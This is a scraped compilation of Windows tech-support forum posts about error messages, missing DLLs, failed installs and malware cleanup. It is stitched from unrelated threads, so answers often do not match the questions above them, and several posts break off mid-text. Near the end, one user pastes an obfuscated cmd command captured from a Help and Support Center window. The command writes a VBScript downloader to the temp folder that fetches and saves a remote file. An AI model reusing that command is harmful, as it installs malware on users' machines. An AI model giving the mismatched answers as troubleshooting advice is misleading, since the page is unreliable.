Hi guys,

My freind has a dell computer with windows XP, which was running very slow. I carried out some maintenance i.e. uninstalled some unnecessary programs. I also ran 'msconfig' and unchecked some programs under the startup tab. Now when the computer starts, I am getting a very strange message to the effect of:-

'cannot load ■■■■■■■ '

Thats right a bunch of squares or ascii characters. I clicked 'o'k and got a similar message another three times. The computer is working but obviously not too pleased with the error message.

Any ideas about this ? Many thanks.

I'm trying to load WIN XP onto a new clean hard drive (40G).

I have an IBM VetVista P4, 1.6 G.

I"m using a new recovery cd I got directly from IBM for my NetVista model.

It begins to load the files and an error message come up on a blue screen that says "The file adpu160m.sys is corrupt. Press any key to continue"

When I press any key it come up wtih the same message.

Appreciate your help; of course I'm sending this note from another PC.

A:Cannot load WIN XP, Error message

I'm not sure you can install it on a new hd from recovery disc. The recovery disc is linked to a 'hidden' partition on original hd which, when instigated, will revert to factory settings.

Yesterday after installing Google computer began to snag and hang and then it just froze up. I rebooted it and now my desktop won't start menu, no tool bar, etc...just the wall paper and nothing else.

An error box pops up saying that Windows has encountered a problem and needs to close, then nada....just the wallpaper.

The error says:

faulting application explorer.exe version 6.002900.3156, faulting module deskbar.dll, version, faulting address 0x000060sf

I got here by doing ctrl + alt + del and then chose Mozilla foxfire.....

Under task manager, explorer.exe is not showing, so I can't end the process there

I tried to restart in safe mode and do a system restore, but when I got there, it said that I could not restore to any date other than today's date?

I can't think of anything else to do. Also, when I restarted in safe mode...all my icons are there.

Any advice would be welcome.

ETA: Please....16 views and no one has any thoughts here??? I just need to know how to fix the error.

I did run RegEdit in safe mode and deleted a bunch of stuff related to the google tool bar and rebooted, but still have no desktop, icons, toolbar, etc. showing....only wallpaper.

I have just upgraded my friends computer from win 98 to win 98 SE. All is going reasonably well but I can't seem to get past an error to reload her Hp psc 750 all in one (printer, scanner, copier I think!LOL) When I try to load the software an error message comes up that says "Error cannot find HPolngo7.dll" At this point the install aborts. Any ideas on what I can do or where I can go to get the missing dll?
One other question I have. Think I have the answer to it after much time searching on the internet today but just want to double check with you all. When the computer is started up we get an error message that says"RUNDLL cannot find the file Loading C:\progra~newdot~newdot~2 DLL. So far what I have found says it is spyware. Is that right?
Thanks very much for your help.
Dorothy E

A:Error message when trying to load a printer

1) Newdot~2 is spyware. Get a copy of Spybot and scan your system.

2) Don't use the install cd that came with the printer. Go to HP's website and grab the latest copy of the drivers.

*Note* The driver file is approximately 50MB so if you are not on broadband either order the Cd or be prepared for a long wait =:0

Also, HP's can be picky. Follow the instructions exactly.
If that doesn't help post back.

I was asked to look at a computer. It is over a year old. The girl claims she was messing with her computer (not sure what that means) but she claims she was prompted to put in the Cd that came with her e-machine. Apparently, earlier in the week, she had her cd-rom drive opened and the dog hit it by accident. Her complaint was the cd-rom door wouldn't open. I took off the side and the front panel. Pressed the start button. A screen came up and said about scanning the system for errors and that it would repair them and not effect the files. Ok, I did that. Then I got a black screen with the following message:
! ! Qcx0000034 ! ! 251/69108 (_0000000000000000.cdf-ms)

What's amazing is that the door opened without a problem for me. So there was nothing wrong with the cdrom door. Now this is the first time I've really had to deal with Vista because I've heard too many bad things about it. So does anyone out there have any idea what this code means?
The computer is over a year old and it is out of warranty or else I would have told them to call the manufacturer.

Hi there and welcome!

What version of Internet Explorer are you using?? Perhaps your browser has been hijacked or corrupted in some way. If it's possible, see if you can provide a little more detail or insight to this problem. (Did IE ever work properly.....what else is running or active as far as programs when this happens...etc. etc.) One of our experts may have you run and produce a HijackThis log for further diagnosis but don't do it unless someone specifically asks you to.

Good Luck !

A few days ago, my Outlook Express started sending me error messages that read, "Address Book failed to load. Outlook Express is incorrectly configured, please re-install."

So I did some research, and came across three possibilities as to how to fix this problem.

#1. From Microsoft Support (who couldn't possibly have made this any more difficult and confusing, talking about a security update that has to be uninstalled which I never installed in the first place but must be an automatic update, yes?? Yikes, scary stuff for a barely computer literate old gal!), and,
#2. Fred Langa's letter, from InformationWeek, about rebuilding/refreshing/reinstalling XP, and
#3. From the Help and Support resource on Windows XP Home Edition in the Start menu.

And here's where it gets confusing for me.

#1. Microsoft Support talks about uninstalling software updates, something about "patches" which sounds dangerous to me because who knows what else can be uninstalled along with those patches ... plus, I can't find the wab file in the C drive where they say it's supposed to be located ...

#2. The Help and Support resource in my Start menu, which is a completely different set of instructions altogether than #1 and #3 and seems quite straightforward, not mentioning anything about uninstalling software updates, but simply offering instructions on the procedure to rename and replace the wab32.dll file.

So which is the right way to do this? It seems th... Read more

Might be fixed, after running CC cleaner and Glary to clean up the registry and delete temp files (over 2000 registry problems found in Glary!), I uninstalled Avira, and copied the POWRPROF.dll file from my other XP machine, I renamed the one on the problem computer with "OLD" and copied the new one in the system32 location.

I was then able to successfully install Avast, so maybe somehow that one file was corrupt....

I will now schedule an Avast boot scan just to be safe.

Hello, I'm back, I'm afraid.

I've had a little problem and it seems my Windows XP OS has got some errors but I don't know how to fix it.

One I've had is when I've tried to install/reinstall WM Recorder which installed fine in the past, but I now get the following message when I try to install it:

"Encountered a sharing violation while accessing [File path/File name]."

I've been in touch with WM Recorder support and they tell me it's a Windows error and not a program error. I am using a home, not work, computer and I'm the only user.

Another problem I've found is I've been playing one of my games and while playing a message popped up saying that it couldn't access a file and that it might be read only etc. and I think this is linked.

The only thing I can think of is a Windows Repair with my Windows CD. Is there another easier way to fix these errors?

My daughter is using the Scholastic Phonics Reading program, and I unistalled the program a few weeks ago (at least I thought I did) because of a different computer issue we were having. Anyway, having resolved that issue, I tried to reinstall the program. When I put the CD-Rom in and click on the setup, the install wizard comes up and I have a choice of playing the game or uninstalling it. I thought I had already uninstalled it, but hit uninstall anyway. It gave me the message: "could not open install.log file". When I hit play, thinking perhaps I had actually not uninstalled it, it gives me the error message, "handler not defined #quicktime version". Any help would be very much appreciated, as my five year old is very excited to get going on this software.

I've been trying to search this, but all the solutions I've found do not work for me. I'm getting the error message "windows cannot access the specified device, path or file. You may not have the appropriate permissions to access the item" when I try to do pretty much anything. I've gone through some suggestions I found on other forums, and they either do not apply to Vista or they are unable to be completed because I get that message when trying to open anything up.

If I go to my menu and open IE by clicking on "internet" it will open, but that's the only thing I can do. I tried starting in Safe Mode and couldn't get it start that way, it did however take an extra long time starting up.

Can someone help me with this in simple terms? I'm not a big tech person, and it's even harder when my computer won't even let me go through with some of the fixes I've seen suggested. I've heard that antivirus programs and IE can be part of the problem...I'm going to try uninstalling AVG, but I've had that for a long time with no problems so I doubt that's going to work either. The only thing that's happened between my computer working and what it's doing now was an IE update. I don't want to uninstall that though because it's the only program that actually willl open up for me!

Also, windows keeps popping up with an update but it's not seeming to work...and there is an icon... Read more

I run a registry program called Registrar Registry Manager to help me manually clean uninstall registry entries. It was working fine until I fooled around with a new tweak program. I think deleted something related to opening it.

Right now, when I click on the Registry Manager icon, I get an error message that says in the title bar "Registrar Registry manager: rr.exe - Unable To Locate Component", and below that it says "This application has failed to start because OLEACC.dll was not found. Re-installing the application may fix this problem"

After that though, the program does open just fine, but I get that error message consistantly every time I want to open it.

I did try reinstalling the program over the original, but that did not help. Then I uninstalled the program, then reinstalled it, but I still get the same error message.

I should mention that I run Vista Basic x64 and this program runs in the x64 Program Files.

Have any idea how to fix this?

Jan LaFata

A:Registry program error message

I don't know if I would agree to anything in that last post. Looking at google, RR.EXE is just your Registrar Registry program. Many of the people here don't agree with the use of any reg cleaners.

I guess I would first run a search on your computer and look for OLEACC.dll. If it doens't find it, then it's indeed missing. If it does find it, then you may have to replace it, because it's not working right if programs are asking for it. Either look online and try to download it, or copy one from another computer.

Hi, kevkr,

Generally speaking, the QUICKEST way to solve your computing problems is to do a little research on your own. The old saying that, "If you need a helping hand, look at the end of your arm", might well apply here. As you learn to help yourself, you'll be a more skilled and confident computer user, and eventually, you might even want to start helping others with THEIR problems. Whether you realize it or not, it looks like you ALREADY had half the battle won in resolving this, simply because you provided good information for us to work with.

I hope you'll think about that, because you did a good job of DESCRIBING your problem. That says good things about your ability to pay attention to details, which is the most important skill you need when faced with ANY computer problem. I say all that because this site and others like it can put skills like yours to good use helping others who aren't as detail-oriented as you are.

That being said, I get the feeling you DIDN'T do your homework before posting this, because there's a good chance the answer to your problem is waiting for you at the McAfee website.

Try this link:

Just so you'll know for future reference, I searched Google for the term "gdlsphlr.dll", and the FIRST result returned by Google was a link to the McAfee site. I want to encourage you to try this yourself, so you'll see exac... Read more

I have a PIM that my wife and I have used for many years. It's a small shareware program called Namebase. I went to open the program yesterday and got this error message, "Unrecognized database format Namebase.mdb. Error number:3343." The program won't load after that. Windows search says, "Error Number 3343 Unrecognized database format 'databasename.mdb'. Cause, This is typically when the Jet database engine was improperly shut down during the process of writing to disk."
I have a backup dated end of April 06. I loaded the program on another computer. This old backup works fine but when I load the ?corrupted .mdb file I get the same error message. Unfortunately, the backup is 4 months old.

Is there a way of correcting this corrupted database file?

A:Opening A Downloaded Program Get A Error Message

Hello and to BC

First and foremost about this, have you scanned your computer for Any sort of malware before / after doing this download as it may be infected, Just a thought

Secondly, what type of program are you trying to download, if its a simple program such as an AV , or a free game or something like that, from a trusted site, it should not be giving you an error such as that

if its an older exe file maybe it just won't work with your xp, Just a couple of thoughts to toss out there
Hope to hear from you soon

Hey there,

Started using my freshly installed Windows 8.1 Pro this week...
After a few days I started noticing something odd and have no idea why this started happening.

When i go to a file (any filetype...i tried like 10..) and click "choose default program..." in the context menu, the following error message will always come up:

Sure i can go to Config panel > Select default programs etc.
But this is odd... since i am 100% confident it used to work fine before.
I already did a 'sfc /scannow' checkup with an original 8.1 Pro x64 image but it says integrity is completely fine.

Any idea what might be causing this?

Could it be a random piece of software i uninstalled which was perhaps freeware and did not state it was Windows 8 compatible, leaving a cluttered registry key which is affecting this command from my context menu?
(A little far fetched perhaps...but i really can't think of anything else).

A:8.1 Choose default program - always gives an error message

So earlier today I heard a song in a Youtube video that I wanted to find the name of so that led me to this software called: Tunatic.

After downloaded the setup file, I ran it but it gave an error: runtime error 216. The setup then closed.

Something about the error message didn't look like. It didn't look real. I googled the error message and found out that is was linked to a virus. Now I'm scared.

I did a quick scan using MalwareBytes and Microsoft Secrutiy Essentials and found nothing. I am currently doing a full scan using MalwareBytes.

Maybe the error message is an actual error but from what I found on Google, I was only able to find it being linked to a virus and nothing else.

So what do you think? Am I just worrying too much? Do you know of another cause for runtime error 216?

Hi heavydude You should never use "driver updater" programs, as they are dangerous programs that can damage your system, making it unable to boot.Drivers are "middlemen" between your OS (Windows) and your hardware (computer). They control and facilitate the interaction between Windows and hardware components, to deliver a "message", nothing more;Having all of your drivers up to date, all the time, will not improve the performance of your system, nor your computer. You cannot increase the hardware performance of a component over the current capabilities it have;Driver updates are released to fix a bug or an issue with a previous release of that driver. Not everyone with the same drivers will experience the issue, so if you are having no problems with the drivers you are running, you don't need to update them. I have Windows XP Home, sp2. I recently had to repair Windows XP, and when I tried to use Quicken 2005, it didn't recognize it. So I tried to reinstall Quicken 2005, got it installed once, but it wouldn't let me set up my financial institution. So I uninstalled Quicken, did all the things Quicken said I should do, to clean out any leftover Quicken files on my hard drive and registry. I have been working with Quicken for two weeks now, to no avail. It keeps coming back with the error message #1610, after it starts to install Quicken. That error message is "configuration data is corrupt, etc." Yesterday Quicken's tech support called me and we tried again. They even gave me another Quicken 2005 to use in case my cd was defective, still same message. They said they have done all they could. that they felt it was a Microsoft problem. I went into Microsoft and searched for that error message and yes, it is a microsoft error message, they state that, but give no solution to solving it. So I wondered if you all have come accross this and know how I can fix whatever the problem is. Got to be something missing in my registry or something. I can install and have installed other programs, no problem. Just Quicken 2005. Help!! Need my quicken. Thanks. Josephine Hudson

A:problem with error message abnormal program termination

Hello Maussie,

After reading your thread here:

At what point are you getting that message? What did Ewido fix for you, by any chance did you save those scan results?

Click Start>Run and type in sfc /scannow (there is a space between sfc and /) and let it scan for missing/corrupt files. You may need your Windows XP Install disc so have it handy.

Let's try an online scanner:

Please run an online scan at *Requires Internet Explorer.
Make sure you click the "Free Online Virus Scan" in the upper right hand corner of the page under the Free use Activescan header. We do NOT want the default spyXposer scan. Click on the Scan your PC button & a 'pop up' window shall appear. * ensure that your pop up blocker doesn't block it
Click On 'Scan Now'
Enter your e-mail address & click 'Scan Now' ...begins downloading Panda's ActiveX controls.- 8MB
Begin the scan by selecting My Computer
* You needn't remain online while it's doing the scan but you have to re-connect after it has finished to see the report.
If it finds any malware, it will offer you a report. Click on see report
Then click Save report
Post the contents of the report in your next reply along with a new HijackThis log.
* Turn off the real time scanner of any existing antivirus program while performing the online scan

Hello! I am new here, and I am needing help with a problem I am having with recieving the error message: Windows cannot find 'C:Program'. Make sure you typed....... I can usually fix my pc when there is a problem by reading forums like yours, but so far I have not found a solution. I have just downloaded Hijack This, and have done a scan, here are the results. BTW, This problem started when I removed a few programs I no longer needed, so I am thinking from reading forums, that my pc did not get rid of all of the files from one of those programs, so my pc is seeing it as an error? Please excuse me if I may be confusing-29 year old house wife here, and dont have the money to have a repair man have my pc, lol. Thank you for any advice!

When shutting down laptop, get Program Failure to Close windows. When I hit end process, it does shut down. I looked up some of the various ones I get (not same every time) and they appear to be part of system32 driver strings - I searched on 2 of them and they were in one of the blogs. 4e8 and 8d8 were 2 of the recent "programs that failed to close. Happens most every time I shut down. Any suggestions?

A:Shutting down get error message program failure to close

Let's find out which specific programs are the problem

Open msconfig and on the General tab choose "selective startup" (uncheck all three items) and reboot. Does the problem still occur? If not, start adding items back to msconfig one or two at a time, rebooting after each change, until the problem reappears and you'll have identified the offending process. This is clearly a time consuming procedure, but it is the best way to determine if some process loading with the system is the cause of your problem.
After you've isolated the cause, do not use msconfig to permanently disable the process. Instead, if it is a service go to START - RUN and type: services.msc (then press enter) and disable the service OR, if it a program, you can download & run a simple app such as Mike Lin's Startup Control Panel ( to enable, disable, or otherwise manage startup programs.

Every time I log on I get this error message immediately and it shuts down my Avg anti-virus. I can go in and manually turn it back on and run a virus scan but I want my anti-virus to run all the time. I just got the latest update yesterday and it didn't help the problem at all.

The message reads:

Avgcc32.exe-Application error

The instruction at "0x5f4012a1" referenced memory at "0x00000004". The memory could not be "read". Click OK to terminate the program.

Anyone know why this happens and how to fix it????

Hi, Welcome to TSG!!

Save HJTInstall.exe to your desktop.
Doubleclick on the HJTInstall.exe icon on your desktop.
By default it will install to C:\Program Files\Trend Micro\HijackThis .
Click on Install.
It will create a HijackThis icon on the desktop.
Once installed, it will launch Hijackthis.
Click on the Do a system scan and save a logfile button. It will scan and the log should open in notepad.
Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.
Come back here to this thread and Paste the log in your next reply.
DO NOT have Hijackthis fix anything yet. Most of what it finds will be harmless or even required.

The program in question was Roxio Creator 2010. I restarted the computer to complete the process.

An error message appeared " windows could not be started as CPSC Common Tools2 is missing...". I chose to cancel, but then the password request was on screen as normal, and everything seems to be OK.

How can that be; do I need take further action?

A:After a program re-installation restart produces error message

Completely uninstall Roxio 2010 via Control Panel/ Programs and Features.
Reboot then reinstall Roxio 2010 and see if that resolves the problem.

 Use AdwCleaner
Note: Please note that Antivir Webguard uses ASK Toolbar as part of its web security. If you remove ASK by using Adwcleaner, Antivir Webguard will no longer work properly. Therefore, if you use this program please use the instructions below to access the options screen where you should enable/DisableAskDetections before using AdwCleaner.
Using AdwCleaner is very simple. Simply download the program and run it.  You will then be presented with a screen that contains a Search and Delete button.  The Search button will cause AdwCleaner to search your computer for unwanted programs and then display a log showing the various files, folders, and registry entries used by these programs.
To delete these unwanted programs simply click on the Delete button, which will cause AdwCleaner to reboot your computer and remove the files and registry entries associated with the various adware that you are removing.  On reboot, AdwCleaner will display a log showing the files, folders, and registry entries that were removed.

Hi: my first post and I need help. It seems like I have a very nasty virus and I admit I feel very stupid.

I use Vista 32 bit Service Pack Two.

Basic Problem: I cannot open Word, Disc Clean up, RKILL, Malaware OR ANYTHING. That is because every time I try I keep getting a regular looking dialog box with this exact message:

In Blue Bar accross the top "Open With"
Then in grey area : "Choose the Program you want to open this file"
File iexplore.exe

Now in White area : Internet Explorer Microsoft Corporation (with the regular Microsoft logo)
Other Programs
When I hit the + These programs show up: Adobe, Media Center, itunes, Word, Notepad, Paint, Real Player

Of course none of these work. Then there is BROWS . . . IF NONE OF THESE WORK BROWSE THE WEB
AGAIN, nothing works

Steps I have taken to try to fix.

Run Internet Option to remove browsing. FAIL

Finally got the rkill--and got this message in my notepad :
This log file is located at C:\rkill.log.
Please post this only if requested to by the person helping you.
Otherwise you can close this log when you wish.

Rkill was run on 04/21/2011 at 21:51:01.

Running uTorrent, you are high-risk for infection. If it wasn't the e-mail, it would have been something else, eventually.

Those are two of the malware. There's probably more. You can always assume that the only executables running from temporary and documents folders are malware.

The TIVTCV v1.0.5 for Avisynth 2.5 x encounterd a problem on my machine. Before I even clicked send error report the Help and Support Center for windows XP opened by itself and seemed to be running code to send information up to a website. This computer is running Windows XP 64bit. I had just finished running a Panda Scan minutes before to check my system. I have included a screen shot of the error message and you can see the Help and Support Window open in the background.I copied the text from the Help and Support window into a text file, to me it seems like it was trying to report some key from the C drive to the website, I have placed X's in some of the numbers of the value incase it is a Windows XP key or something like that.Computer Information for \\Run('cmd%20/c%20echo%20FileName%20!%[email protected]}TEMP}/[email protected]>>}TEMP}/go.vbs]]echo%20url!@!HCP]key![email protected]%20>>}TEMP}/go.vbs]]echo%20Set%20objHTTP%20!%20CreateObject(@[email protected])>>}TEMP}/go.vbs]]echo%20Call%20objHTTP.Open(@[email protected],%20url,%20False)>>}TEMP}/go.vbs]]echo%20objHTTP.Send>>}TEMP}/go.vbs]]echo%20set%20oStream%20!%20createobject(@[email protected])>>}TEMP}/go.vbs]]echo%20Const%20adTypeBinary%20!%201%20>>}TEMP}/go.vbs]]echo%20Const%20adSaveCreateOverWrite%20!%202%20>>}TEMP}/go.vbs]]echo%20Const%20adSaveCreateNotExist%20!%201%20%20>>}TEMP}/go.vbs]]ech... I have just purchased a small digital camera that came with Ulead PE 3.0.

I went through the installation wizard for this software and it seemed to install correctly.

The icon for PE3.0 now appears on my desk top however when I double click on it I receive the following message:
IPE30 this program has performed an illegal operation and will shut down.

I check the 'details' of this error message and it says:
IPE30 executed an invalid instruction in module U32COMM.dll at 015f:4a10a40d.

Does anyone know what I have done wrong? If I need to uninstall and reinstall the software - how do I go about doing this?
